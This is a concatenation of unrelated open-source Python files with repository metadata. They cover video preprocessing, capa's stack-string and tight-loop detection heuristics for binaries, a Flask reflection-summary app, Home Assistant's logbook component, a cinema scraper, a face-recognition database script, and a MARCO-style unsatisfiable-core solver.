np.dtype('uint8'))\n\n fn, ret = 0, True\n while fn < n_frames and ret:\n ret, img = cap.read()\n frames[fn] = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n fn += 1\n\n cap.release()\n return frames\n\n\ndef select_random_frames(frames):\n S = random.sample(range(len(frames)), k=K+1) \n return [frames[s] for s in S]\n\n\ndef save_video(path, video_id, frames, face_alignment):\n if not os.path.isdir(path):\n os.makedirs(path)\n\n data = []\n for i in range(len(frames)):\n x = frames[i]\n y = face_alignment.get_landmarks(x)[0]\n data.append({\n 'frame': x,\n 'landmarks': y,\n })\n\n filename = f'{video_id}.vid'\n pkl.dump(data, open(os.path.join(path, filename), 'wb'))\n logging.info(f'Saved file: {filename}')\n\n\nif __name__ == '__main__':\n # preprocess_dataset(\"D:\\Voxceleb2\", \"D:\\VoxPickle\", size=1000)\n pass","repo_name":"tusharGOEL1/TalkingHeads","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26371419559","text":"import string\nimport struct\n\nfrom capa.features.common import Characteristic\nfrom capa.features.basicblock import BasicBlock\nfrom capa.features.extractors.helpers import MIN_STACKSTRING_LEN\n\n\ndef _bb_has_tight_loop(f, bb):\n \"\"\"\n parse tight loops, true if last instruction in basic block branches to bb start\n \"\"\"\n return bb.offset in f.blockrefs[bb.offset] if bb.offset in f.blockrefs else False\n\n\ndef extract_bb_tight_loop(f, bb):\n \"\"\"check basic block for tight loop indicators\"\"\"\n if _bb_has_tight_loop(f, bb):\n yield Characteristic(\"tight loop\"), bb.offset\n\n\ndef _bb_has_stackstring(f, bb):\n \"\"\"\n extract potential stackstring creation, using the following heuristics:\n - basic block contains enough moves of constant bytes to the stack\n \"\"\"\n count = 0\n for instr in bb.getInstructions():\n if is_mov_imm_to_stack(instr):\n count += get_printable_len(instr.getDetailed())\n if count > MIN_STACKSTRING_LEN:\n return True\n return False\n\n\ndef get_operands(smda_ins):\n return [o.strip() for o in smda_ins.operands.split(\",\")]\n\n\ndef extract_stackstring(f, bb):\n \"\"\"check basic block for stackstring indicators\"\"\"\n if _bb_has_stackstring(f, bb):\n yield Characteristic(\"stack string\"), bb.offset\n\n\ndef is_mov_imm_to_stack(smda_ins):\n \"\"\"\n Return if instruction moves immediate onto stack\n \"\"\"\n if not smda_ins.mnemonic.startswith(\"mov\"):\n return False\n\n try:\n dst, src = get_operands(smda_ins)\n except ValueError:\n # not two operands\n return False\n\n try:\n int(src, 16)\n except ValueError:\n return False\n\n if not any(regname in dst for regname in [\"ebp\", \"rbp\", \"esp\", \"rsp\"]):\n return False\n\n return True\n\n\ndef is_printable_ascii(chars):\n return all(c < 127 and chr(c) in string.printable for c in chars)\n\n\ndef is_printable_utf16le(chars):\n if all(c == 0x00 for c in chars[1::2]):\n return is_printable_ascii(chars[::2])\n\n\ndef get_printable_len(instr):\n \"\"\"\n Return string length if all operand bytes are ascii or utf16-le printable\n\n Works on a capstone instruction\n \"\"\"\n # should have exactly two operands for mov immediate\n if len(instr.operands) != 2:\n return 0\n\n op_value = instr.operands[1].value.imm\n\n if instr.imm_size == 1:\n chars = struct.pack(\" 0:\n avg_sentiment = sum(sentiments) / len(sentiments)\n else:\n avg_sentiment = 0\n\n # Determine sentiment description\n if avg_sentiment > 0.5:\n sentiment_desc = 'positive'\n elif avg_sentiment < -0.5:\n sentiment_desc = 'challenging'\n else:\n sentiment_desc = 'mixed'\n\n common_words = bag_of_words.most_common(5)\n themes = ', '.join([word[0] for word in common_words])\n\n # Use the OpenAI API to generate a creative summary\n prompt = f\"The weeks sentiment score for rose, bud, thorn reflections was {avg_sentiment} and the recurring words in the reflections were {themes}. Create a personalized summary of these results for the specific user. Don't specifically mention snetiment score discuss what the score represents for the user. Talk using your and you.\"\n\n response = openai.Completion.create(\n engine=\"text-davinci-003\", prompt=prompt, max_tokens=60, temperature=0.85)\n\n summary_text = response.choices[0].text.strip()\n\n # Store the summary in Firebase\n user_summaries_subcol = db.collection('summaries').document(\n user_id).collection('user_summaries')\n user_summaries_subcol.add({\n 'date': date.today().strftime('%Y-%m-%d'),\n 'summary': summary_text\n })\n return summary_text\n\n\n@app.route('/api/reflections', methods=['POST'])\ndef get_reflections():\n \"\"\"Fetch the user's reflections based on their user_id.\"\"\"\n user_id = request.json.get('user_id')\n\n if not user_id:\n return jsonify({'message': 'user_id not provided'}), 400\n\n try:\n # Fetch the reflections for the given user from Firestore\n user_reflections = db.collection('reflections').document(\n user_id).collection('user_reflections').stream()\n\n reflections_data = {}\n for reflection in user_reflections:\n data = reflection.to_dict()\n reflections_data[data['date']] = {\n 'bud': data.get('bud'),\n 'thorn': data.get('thorn'),\n 'rose': data.get('rose'),\n }\n\n if not reflections_data:\n return jsonify({'message': 'No reflections found for this user.'}), 404\n\n return jsonify(reflections_data), 200\n except Exception as e:\n error_message = str(e)\n return jsonify({'message': 'Error fetching reflections', 'error': error_message}), 500\n\n\n@app.route('/api/summaries', methods=['POST'])\ndef get_summaries():\n \"\"\"Fetch the user's weekly summaries based on their user_id.\"\"\"\n user_id = request.json.get('user_id')\n\n if not user_id:\n return jsonify({'message': 'user_id not provided'}), 400\n\n try:\n # Fetch the reflections for the given user from Firestore\n user_summaries = db.collection('summaries').document(\n user_id).collection('user_summaries').stream()\n\n summary_data = {}\n for summary in user_summaries:\n data = summary.to_dict()\n summary_data[data['date']] = {\n 'summary': data.get('summary')\n }\n\n if not summary_data:\n return jsonify({'message': 'No reflections found for this user.'}), 404\n\n return jsonify(summary_data), 200\n except Exception as e:\n error_message = str(e)\n return jsonify({'message': 'Error fetching reflections', 'error': error_message}), 500\n\n\nif __name__ == '__main__':\n app.run(port=8000, debug=True)\n","repo_name":"MarlonGrandy/RoseBudThorn","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20417198715","text":"\"\"\"\nEvent parser and human readable log generator.\n\nFor more details about this component, please refer to the documentation at\nhttps://home-assistant.io/components/logbook/\n\"\"\"\nfrom datetime import timedelta\nfrom itertools import groupby\nimport logging\n\nimport voluptuous as vol\n\nfrom homeassistant.components import sun\nfrom homeassistant.components.http import HomeAssistantView\nfrom homeassistant.const import (\n ATTR_DOMAIN, ATTR_ENTITY_ID, ATTR_HIDDEN, ATTR_NAME, CONF_EXCLUDE,\n CONF_INCLUDE, EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,\n EVENT_LOGBOOK_ENTRY, EVENT_STATE_CHANGED, HTTP_BAD_REQUEST, STATE_NOT_HOME,\n STATE_OFF, STATE_ON)\nfrom homeassistant.core import DOMAIN as HA_DOMAIN\nfrom homeassistant.core import State, callback, split_entity_id\nimport homeassistant.helpers.config_validation as cv\nimport homeassistant.util.dt as dt_util\n\n_LOGGER = logging.getLogger(__name__)\n\nATTR_MESSAGE = 'message'\n\nCONF_DOMAINS = 'domains'\nCONF_ENTITIES = 'entities'\nCONTINUOUS_DOMAINS = ['proximity', 'sensor']\n\nDEPENDENCIES = ['recorder', 'frontend']\n\nDOMAIN = 'logbook'\n\nGROUP_BY_MINUTES = 15\n\nCONFIG_SCHEMA = vol.Schema({\n DOMAIN: vol.Schema({\n CONF_EXCLUDE: vol.Schema({\n vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,\n vol.Optional(CONF_DOMAINS, default=[]):\n vol.All(cv.ensure_list, [cv.string])\n }),\n CONF_INCLUDE: vol.Schema({\n vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,\n vol.Optional(CONF_DOMAINS, default=[]):\n vol.All(cv.ensure_list, [cv.string])\n })\n }),\n}, extra=vol.ALLOW_EXTRA)\n\nALL_EVENT_TYPES = [\n EVENT_STATE_CHANGED, EVENT_LOGBOOK_ENTRY,\n EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP\n]\n\nLOG_MESSAGE_SCHEMA = vol.Schema({\n vol.Required(ATTR_NAME): cv.string,\n vol.Required(ATTR_MESSAGE): cv.template,\n vol.Optional(ATTR_DOMAIN): cv.slug,\n vol.Optional(ATTR_ENTITY_ID): cv.entity_id,\n})\n\n\ndef log_entry(hass, name, message, domain=None, entity_id=None):\n \"\"\"Add an entry to the logbook.\"\"\"\n hass.add_job(async_log_entry, hass, name, message, domain, entity_id)\n\n\ndef async_log_entry(hass, name, message, domain=None, entity_id=None):\n \"\"\"Add an entry to the logbook.\"\"\"\n data = {\n ATTR_NAME: name,\n ATTR_MESSAGE: message\n }\n\n if domain is not None:\n data[ATTR_DOMAIN] = domain\n if entity_id is not None:\n data[ATTR_ENTITY_ID] = entity_id\n hass.bus.async_fire(EVENT_LOGBOOK_ENTRY, data)\n\n\nasync def setup(hass, config):\n \"\"\"Listen for download events to download files.\"\"\"\n @callback\n def log_message(service):\n \"\"\"Handle sending notification message service calls.\"\"\"\n message = service.data[ATTR_MESSAGE]\n name = service.data[ATTR_NAME]\n domain = service.data.get(ATTR_DOMAIN)\n entity_id = service.data.get(ATTR_ENTITY_ID)\n\n message.hass = hass\n message = message.async_render()\n async_log_entry(hass, name, message, domain, entity_id)\n\n hass.http.register_view(LogbookView(config.get(DOMAIN, {})))\n\n await hass.components.frontend.async_register_built_in_panel(\n 'logbook', 'logbook', 'mdi:format-list-bulleted-type')\n\n hass.services.async_register(\n DOMAIN, 'log', log_message, schema=LOG_MESSAGE_SCHEMA)\n return True\n\n\nclass LogbookView(HomeAssistantView):\n \"\"\"Handle logbook view requests.\"\"\"\n\n url = '/api/logbook'\n name = 'api:logbook'\n extra_urls = ['/api/logbook/{datetime}']\n\n def __init__(self, config):\n \"\"\"Initialize the logbook view.\"\"\"\n self.config = config\n\n async def get(self, request, datetime=None):\n \"\"\"Retrieve logbook entries.\"\"\"\n if datetime:\n datetime = dt_util.parse_datetime(datetime)\n\n if datetime is None:\n return self.json_message('Invalid datetime', HTTP_BAD_REQUEST)\n else:\n datetime = dt_util.start_of_local_day()\n\n start_day = dt_util.as_utc(datetime)\n end_day = start_day + timedelta(days=1)\n hass = request.app['hass']\n\n def json_events():\n \"\"\"Fetch events and generate JSON.\"\"\"\n return self.json(list(\n _get_events(hass, self.config, start_day, end_day)))\n\n return await hass.async_add_job(json_events)\n\n\nclass Entry(object):\n \"\"\"A human readable version of the log.\"\"\"\n\n def __init__(self, when=None, name=None, message=None, domain=None,\n entity_id=None):\n \"\"\"Initialize the entry.\"\"\"\n self.when = when\n self.name = name\n self.message = message\n self.domain = domain\n self.entity_id = entity_id\n\n def as_dict(self):\n \"\"\"Convert entry to a dict to be used within JSON.\"\"\"\n return {\n 'when': self.when,\n 'name': self.name,\n 'message': self.message,\n 'domain': self.domain,\n 'entity_id': self.entity_id,\n }\n\n\ndef humanify(events):\n \"\"\"Generate a converted list of events into Entry objects.\n\n Will try to group events if possible:\n - if 2+ sensor updates in GROUP_BY_MINUTES, show last\n - if home assistant stop and start happen in same minute call it restarted\n \"\"\"\n domain_prefixes = tuple('{}.'.format(dom) for dom in CONTINUOUS_DOMAINS)\n\n # Group events in batches of GROUP_BY_MINUTES\n for _, g_events in groupby(\n events,\n lambda event: event.time_fired.minute // GROUP_BY_MINUTES):\n\n events_batch = list(g_events)\n\n # Keep track of last sensor states\n last_sensor_event = {}\n\n # Group HA start/stop events\n # Maps minute of event to 1: stop, 2: stop + start\n start_stop_events = {}\n\n # Process events\n for event in events_batch:\n if event.event_type == EVENT_STATE_CHANGED:\n entity_id = event.data.get('entity_id')\n\n if entity_id.startswith(domain_prefixes):\n last_sensor_event[entity_id] = event\n\n elif event.event_type == EVENT_HOMEASSISTANT_STOP:\n if event.time_fired.minute in start_stop_events:\n continue\n\n start_stop_events[event.time_fired.minute] = 1\n\n elif event.event_type == EVENT_HOMEASSISTANT_START:\n if event.time_fired.minute not in start_stop_events:\n continue\n\n start_stop_events[event.time_fired.minute] = 2\n\n # Yield entries\n for event in events_batch:\n if event.event_type == EVENT_STATE_CHANGED:\n\n to_state = State.from_dict(event.data.get('new_state'))\n\n domain = to_state.domain\n\n # Skip all but the last sensor state\n if domain in CONTINUOUS_DOMAINS and \\\n event != last_sensor_event[to_state.entity_id]:\n continue\n\n # Don't show continuous sensor value changes in the logbook\n if domain in CONTINUOUS_DOMAINS and \\\n to_state.attributes.get('unit_of_measurement'):\n continue\n\n yield Entry(\n event.time_fired,\n name=to_state.name,\n message=_entry_message_from_state(domain, to_state),\n domain=domain,\n entity_id=to_state.entity_id)\n\n elif event.event_type == EVENT_HOMEASSISTANT_START:\n if start_stop_events.get(event.time_fired.minute) == 2:\n continue\n\n yield Entry(\n event.time_fired, \"Home Assistant\", \"started\",\n domain=HA_DOMAIN)\n\n elif event.event_type == EVENT_HOMEASSISTANT_STOP:\n if start_stop_events.get(event.time_fired.minute) == 2:\n action = \"restarted\"\n else:\n action = \"stopped\"\n\n yield Entry(\n event.time_fired, \"Home Assistant\", action,\n domain=HA_DOMAIN)\n\n elif event.event_type == EVENT_LOGBOOK_ENTRY:\n domain = event.data.get(ATTR_DOMAIN)\n entity_id = event.data.get(ATTR_ENTITY_ID)\n if domain is None and entity_id is not None:\n try:\n domain = split_entity_id(str(entity_id))[0]\n except IndexError:\n pass\n\n yield Entry(\n event.time_fired, event.data.get(ATTR_NAME),\n event.data.get(ATTR_MESSAGE), domain,\n entity_id)\n\n\ndef _get_events(hass, config, start_day, end_day):\n \"\"\"Get events for a period of time.\"\"\"\n from homeassistant.components.recorder.models import Events, States\n from homeassistant.components.recorder.util import (\n execute, session_scope)\n\n with session_scope(hass=hass) as session:\n query = session.query(Events).order_by(Events.time_fired) \\\n .outerjoin(States, (Events.event_id == States.event_id)) \\\n .filter(Events.event_type.in_(ALL_EVENT_TYPES)) \\\n .filter((Events.time_fired > start_day)\n & (Events.time_fired < end_day)) \\\n .filter((States.last_updated == States.last_changed)\n | (States.state_id.is_(None)))\n events = execute(query)\n return humanify(_exclude_events(events, config))\n\n\ndef _exclude_events(events, config):\n \"\"\"Get list of filtered events.\"\"\"\n excluded_entities = []\n excluded_domains = []\n included_entities = []\n included_domains = []\n exclude = config.get(CONF_EXCLUDE)\n if exclude:\n excluded_entities = exclude[CONF_ENTITIES]\n excluded_domains = exclude[CONF_DOMAINS]\n include = config.get(CONF_INCLUDE)\n if include:\n included_entities = include[CONF_ENTITIES]\n included_domains = include[CONF_DOMAINS]\n\n filtered_events = []\n for event in events:\n domain, entity_id = None, None\n\n if event.event_type == EVENT_STATE_CHANGED:\n entity_id = event.data.get('entity_id')\n\n if entity_id is None:\n continue\n\n # Do not report on new entities\n if event.data.get('old_state') is None:\n continue\n\n new_state = event.data.get('new_state')\n\n # Do not report on entity removal\n if not new_state:\n continue\n\n attributes = new_state.get('attributes', {})\n\n # If last_changed != last_updated only attributes have changed\n # we do not report on that yet.\n last_changed = new_state.get('last_changed')\n last_updated = new_state.get('last_updated')\n if last_changed != last_updated:\n continue\n\n domain = split_entity_id(entity_id)[0]\n\n # Also filter auto groups.\n if domain == 'group' and attributes.get('auto', False):\n continue\n\n # exclude entities which are customized hidden\n hidden = attributes.get(ATTR_HIDDEN, False)\n if hidden:\n continue\n\n elif event.event_type == EVENT_LOGBOOK_ENTRY:\n domain = event.data.get(ATTR_DOMAIN)\n entity_id = event.data.get(ATTR_ENTITY_ID)\n\n if domain or entity_id:\n # filter if only excluded is configured for this domain\n if excluded_domains and domain in excluded_domains and \\\n not included_domains:\n if (included_entities and entity_id not in included_entities) \\\n or not included_entities:\n continue\n # filter if only included is configured for this domain\n elif not excluded_domains and included_domains and \\\n domain not in included_domains:\n if (included_entities and entity_id not in included_entities) \\\n or not included_entities:\n continue\n # filter if included and excluded is configured for this domain\n elif excluded_domains and included_domains and \\\n (domain not in included_domains or\n domain in excluded_domains):\n if (included_entities and entity_id not in included_entities) \\\n or not included_entities or domain in excluded_domains:\n continue\n # filter if only included is configured for this entity\n elif not excluded_domains and not included_domains and \\\n included_entities and entity_id not in included_entities:\n continue\n # check if logbook entry is excluded for this entity\n if entity_id in excluded_entities:\n continue\n filtered_events.append(event)\n return filtered_events\n\n\n# pylint: disable=too-many-return-statements\ndef _entry_message_from_state(domain, state):\n \"\"\"Convert a state to a message for the logbook.\"\"\"\n # We pass domain in so we don't have to split entity_id again\n if domain == 'device_tracker':\n if state.state == STATE_NOT_HOME:\n return 'is away'\n return 'is at {}'.format(state.state)\n\n elif domain == 'sun':\n if state.state == sun.STATE_ABOVE_HORIZON:\n return 'has risen'\n return 'has set'\n\n elif state.state == STATE_ON:\n # Future: combine groups and its entity entries ?\n return \"turned on\"\n\n elif state.state == STATE_OFF:\n return \"turned off\"\n\n return \"changed to {}\".format(state.state)\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/components/logbook.py","file_name":"logbook.py","file_ext":"py","file_size_in_byte":13711,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"33326107977","text":"import datetime\r\nimport requests\r\nimport json\r\nimport funcs\r\nfrom bs4 import BeautifulSoup\r\n\r\nclass Parser:\r\n def __init__(self, url):\r\n self.header = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\"}\r\n self.session = requests.Session()\r\n self.session.header = self.header\r\n self.html = self.session.post(url).text\r\n self.soup = BeautifulSoup(self.html, \"html.parser\")\r\n if \"sky-cinema\" in url:\r\n self.cinema = \"SC\"\r\n else:\r\n self.cinema = \"CK\"\r\n\r\n def getFilmsParameters(self):\r\n try:\r\n films = {}\r\n filmsParas = \"\"\r\n section = self.soup.find(\"div\",{\"class\":\"afisha-view afisha-view-list show\"})\r\n film_det = section.find_all(\"div\", {\"class\":\"film-detail\"})\r\n for elem in film_det:\r\n for elem2 in elem.find_all(\"div\", {\"class\":\"film-seances filter-block\"}):\r\n for elem3 in elem2:\r\n if (elem3.find(\"a\") != None) and (elem3.find(\"a\") != -1):\r\n currFilmParas = elem3.find(\"a\").get(\"onclick\").replace(\"prebookManager.showHall(\",\"\").replace(\")\", \"\").replace(\";\",\"\").split()[0]\r\n if currFilmParas != \"return\":\r\n filmsParas += currFilmParas.replace(\"}\", \",\")+f\"\\\"time\\\":'{elem3.find('a').get_text()}', \\\"cost\\\":'{elem3.find('span').get_text()+' руб'}', \\\"format\\\":'{elem3.find('li').get('data-title')}', \"+\"}, \"\r\n films[elem.find(\"h3\", {\"class\": \"film-title\"}).get_text()] = elem.find(\"p\", {\"class\":\"film-genre\"}).get_text(), eval(filmsParas), elem.find(\"h3\", {\"class\": \"film-title\"}).find(\"a\").get(\"href\")\r\n return films\r\n except:\r\n return True\r\n\r\ndef cinemaParser(cmdType):\r\n cmd = funcs.voice\r\n\r\n if \"континент\" in cmd.lower():\r\n url = \"https://conti.sky-cinema.ru/\"\r\n\r\n elif \"современник\" in cmd.lower():\r\n url = \"https://sovr.sky-cinema.ru/\"\r\n\r\n else:\r\n url = \"http://gd.sky-cinema.ru/\"\r\n\r\n Helper = Parser(url)\r\n\r\n if cmdType == \"findFilms\":\r\n films = Helper.getFilmsParameters()\r\n try:\r\n if films:\r\n if datetime.datetime.now().hour != 0:\r\n funcs.speak(\"На сегодня нет свободных сеансов, посмотрим на завтра\")\r\n url += \"?schedule_date=2019-{}-{}&schedule_list_ajax=Y\".format(datetime.datetime.now().day+1, datetime.datetime.now().month)\r\n else:\r\n url += \"?schedule_date=2019-{}-{}&schedule_list_ajax=Y\".format(datetime.datetime.now().day, datetime.datetime.now().month)\r\n Helper = Parser(url)\r\n films = Helper.getFilmsParameters()\r\n\r\n for elem in films:\r\n funcs.speak(elem)\r\n funcs.speak(\"Если вы хотите посмотреть информацию о фильме, укажите его название в конце предложения, в именительном падеже. Также вы можете указать любой филиал skycinema перед названием фильма, по умолчанию я буду искать фильмы в Гостинном дворе.\")\r\n except:\r\n funcs.speak(\"К сожалению, я не могу найти фильмы в данном филиале\")\r\n \r\n if cmdType == \"findFilmInfoInCinema\":\r\n try:\r\n films = Helper.getFilmsParameters()\r\n if films:\r\n if datetime.datetime.now().hour != 0:\r\n funcs.speak(\"На сегодня нет свободных сеансов, посмотрим на завтра\")\r\n url += \"?schedule_date=2019-{}-{}&schedule_list_ajax=Y\".format(datetime.datetime.now().day+1, datetime.datetime.now().month)\r\n else:\r\n url += \"?schedule_date=2019-{}-{}&schedule_list_ajax=Y\".format(datetime.datetime.now().day, datetime.datetime.now().month)\r\n Helper = Parser(url)\r\n films = Helper.getFilmsParameters()\r\n\r\n filmName = cmd.split()[-1].title()\r\n if filmName in films:\r\n funcs.speak(\"Вот что мне удалось найти\")\r\n funcs.speak(films[filmName][0])\r\n for i in range(len(films[filmName][1])):\r\n print(f'\\n\\nНачало в: {films[filmName][1][i][\"time\"]}\\nСтоимость: {films[filmName][1][i][\"cost\"]}\\nФормат: {films[filmName][1][i][\"format\"]}')\r\n else:\r\n funcs.speak(\"Данного фильма нет в прокате\")\r\n except:\r\n funcs.speak(\"К сожалению, я не могу найти фильм в данном филиале\")","repo_name":"zl0b4/Voice-Assistant","sub_path":"cinemaParserModule.py","file_name":"cinemaParserModule.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"24272703076","text":"import cv2 #pip install opencv-python\nimport face_recognition #pip install cspan, install dlib, install face_recognition\nimport mysql.connector\nimport os\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"liam\",\n passwd=\"root\",\n database=\"knownIndividuals\"\n)\n\nc = db.cursor()\n\n#finds image in file and converts it to binary code\nimg = cv2.imread(\"C:/Users/Liam/Desktop/Main project/images/G00377746.jpg\")\nrgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\nimg_encoding = face_recognition.face_encodings(rgb_img)[0]\nprint(img_encoding)\n\n#finds image in file and converts it to binary code\nimg2 = cv2.imread(\"C:/Users/Liam/Desktop/Main project/images/G00377746Test.jpg\")\nrgb_img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2RGB)\nimg_encoding2 = face_recognition.face_encodings(rgb_img2)[0]\n\n#compares binary code of two images and sees if they are both the same\nresults = face_recognition.compare_faces([img_encoding], img_encoding2)\nprint(results)\nif results == [True]:\n print(\"found a match\")\n #removes the previously found person\n c.execute(\"delete from currentid;\")\n db.commit()\n #puts in the name of the person who is currently identified, this is used as a reference to pull the correct data\n c.execute(\"insert into currentid values ('G00377746');\")\n db.commit()\n \nelse:\n print(\"unknown\")\n \n\ncv2.imshow(\"img\", img)","repo_name":"LiamB16/Applied-Project-and-minor-dissertation","sub_path":"Camera2.py","file_name":"Camera2.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9782907864","text":"# Пройдите в цикле по списку [\"Вася\", \"Маша\", \"Петя\", \"Валера\", \"Саша\", \"Даша\"] пока не встретите имя \"Валера\".\n# Когда найдете напишите \"Валера нашелся\". Подсказка: используйте метод list.pop()\n# Перепишите предыдущий пример в виде функции find_person(name), которая ищет имя в списке.\n\n# Задаём переменные\nNAMES = [\"Вася\", \"Маша\", \"Петя\", \"Валера\", \"Саша\", \"Даша\"]\n\ndef find_person(search_name):\n find_status = 'Не найден'\n while len(NAMES) > 0:\n name = NAMES.pop()\n # print(name)\n if name == search_name:\n find_status = 'Нашёлся!'\n break\n return find_status\n\nprint(NAMES)\nprint('Валера: {}'.format(find_person('Валера')))\n","repo_name":"Frostman13/homework","sub_path":"lesson1/hw23.py","file_name":"hw23.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6159884136","text":"from random import shuffle\nimport time\nfrom z3 import *\nfrom typing import Optional, Callable\nimport networkx\nfrom pydantic import BaseModel\nfrom itertools import product, combinations\n\n\nclass RuleSet(BaseModel):\n rules: set[int]\n setId: int\n\n\nclass Error(BaseModel):\n error_id: int\n mus_list: list[RuleSet]\n mcs_list: list[RuleSet]\n mss_list: list[RuleSet]\n\n\nclass Marco:\n def __init__(self, rules: set[int],\n sat_fun: Callable[[set[int]], bool],\n parent_relations: list[tuple[int, int]],\n optimization: bool = True\n ):\n self.rules = frozenset(rules)\n self.graph = networkx.Graph()\n self.mus_list: set[frozenset[int]] = set()\n self.mss_list: set[frozenset[int]] = set()\n self.mcs_list: set[frozenset[int]] = set()\n self.tc_errors: list[Error] = []\n self.parent_relations: list[tuple[int, int]] = parent_relations\n self.solver = Solver()\n self.loop_counter = 0\n self.sat_counter = 0\n self.max_loops = 999\n self.sat_fun = sat_fun\n self.optimization = optimization\n\n def grow(self, seed: frozenset[int]) -> frozenset[int]:\n # print('growing')\n for c in (self.rules - seed):\n if self.sat(seed | {c}):\n seed = seed | {c}\n\n return seed\n\n def shrink(self, seed: frozenset[int]) -> frozenset[int]:\n # print('shrinking ', seed)\n for c in seed:\n if not self.sat(seed - {c}):\n seed = seed - {c}\n\n return seed\n\n def get_other_msses(self, mcs: frozenset[int]) -> set[frozenset[int]]:\n # if relation holds: parent_child(p1, p2), and P - ({p2} + C) is MSS, and pi\n # then P - ({p1) + C) + {pi . parent_child(p1, pi}\n # print('getting other mss')\n alternatives = []\n for rule in mcs:\n replacers = [rule]\n for parent, child in self.parent_relations:\n if child == rule:\n replacers.append(parent)\n alternatives.append(replacers)\n\n possible_mixes = product(*alternatives)\n combination_sets = {frozenset(combination) for combination in possible_mixes}\n remove_parent_child = set()\n for possible_mcs in combination_sets:\n removed = set(possible_mcs)\n for comb in combinations(possible_mcs, 2):\n if (comb[0], comb[1]) in self.parent_relations:\n removed.remove(comb[1])\n elif (comb[1], comb[0]) in self.parent_relations:\n removed.remove(comb[0])\n remove_parent_child.add(frozenset(removed))\n\n\n new_mcses = remove_parent_child - {mcs}\n return new_mcses\n # if len(new_mcses) == 0:\n # return set()\n # else:\n # new_mcses_ = [new_mcses]\n # for new_mcs in new_mcses:\n # new_mcses_.append(self.get_other_msses(new_mcs))\n # new_new_mcses = set().union(*new_mcses_)\n # print('for set ', mcs, ' \\nthe new mcses are generated: ', new_mcses)\n # print('for set ', mcs, ' \\nthe new new mcses are generated: ', new_new_mcses)\n # return set().union(*new_mcses_)\n\n # return [set(s) for s in combination_sets if s != frozenset(mus)]\n def get_unexplored(self, model: ModelRef) -> frozenset[int]:\n seeds = []\n for rid in self.rules:\n assignment: bool = not is_false(model.eval(Bool(rid)))\n seeds.append(assignment)\n # print(seeds)\n return frozenset({ruleId for keep, ruleId in zip(seeds, self.rules) if keep})\n\n def is_satisfiable(self) -> (bool, Optional[ModelRef]):\n if self.solver.check().r == 1:\n return True, self.solver.model()\n else:\n return False, None\n\n def sat(self, rules: frozenset[int]) -> bool:\n self.sat_counter += 1\n return self.sat_fun(set(rules))\n\n def run(self):\n print('start marco', time.time())\n successful, model = self.is_satisfiable()\n while successful:\n if self.loop_counter >= self.max_loops:\n raise Exception(\"Too many loops\")\n self.loop_counter += 1\n if len(self.mss_list) > 1 and len(self.mss_list) > 16:\n print('finished prematurely after ', self.sat_counter, ' runs', time.time())\n return\n\n seed = self.get_unexplored(model)\n if self.sat(seed):\n mss = self.grow(seed)\n\n self.mss_list.add(mss)\n self.solver.add(Or([Bool(r) for r in self.rules if r not in mss]))\n if self.optimization:\n other_mcses = self.get_other_msses(self.rules - mss)\n for other_mcs in other_mcses:\n self.solver.add(Or([Bool(r) for r in self.rules if r in other_mcs]))\n\n\n else:\n mus = self.shrink(seed)\n self.mus_list.add(frozenset(mus))\n self.solver.add(Not(And([Bool(r) for r in mus])))\n\n successful, model = self.is_satisfiable()\n print('finished after ', self.sat_counter, ' runs', time.time())\n\n def analyse(self):\n mcs_counter = 0\n # Populate mcs list\n print('start analysis', time.time())\n for mss in self.mss_list:\n self.mcs_list.add(self.rules - mss)\n\n mus_index_list = list(enumerate(self.mus_list))\n self.graph.add_nodes_from([i for i, mus in mus_index_list])\n\n for combination in combinations(mus_index_list, 2):\n index1, mus1 = combination[0]\n index2, mus2 = combination[1]\n if mus1 & mus2 != set():\n self.graph.add_edge(index1, index2)\n print('finish building graph', time.time())\n for i, component in enumerate(networkx.connected_components(self.graph)):\n\n mus_list = [mus_index_list[musId][1] for musId in component]\n mcs_list = []\n mss_list = []\n all_mus_rules: set[int] = set().union(*[mus for mus in mus_list])\n reduced_mcses = [RuleSet(setId=mcsId, rules=mcs & all_mus_rules) for mcsId, mcs in enumerate(self.mcs_list)]\n non_empty_mcses = [mcs for mcs in reduced_mcses if len(mcs.rules) != 0]\n seen = []\n for mcs in non_empty_mcses:\n if mcs.rules in seen:\n continue\n else:\n seen.append(mcs.rules)\n mcs_list.append(mcs)\n mss_list.append([RuleSet(setId=mssId, rules=mss) for mssId, mss in enumerate(self.mss_list) if mssId == mcs.setId][0])\n\n mus_ruleset = [RuleSet(setId=musId, rules=set(mus)) for musId, mus in enumerate(mus_list)]\n self.tc_errors.append(Error(error_id=i, mus_list=mus_ruleset, mcs_list=mcs_list, mss_list=mss_list))\n print('finish analysis', time.time())\n\n def show(self):\n print(f\"Process finished after {self.loop_counter} iterations\")\n print(f\"{len(self.tc_errors)} islands found in the code\")\n for island in self.tc_errors:\n print(f\"island:\")\n print(f\"\\nMUSs:\")\n for mus in island.mus_list:\n print(mus)\n\n print(f\"\\nMCSs:\")\n for mcs in island.mcs_list:\n print(mcs)\n 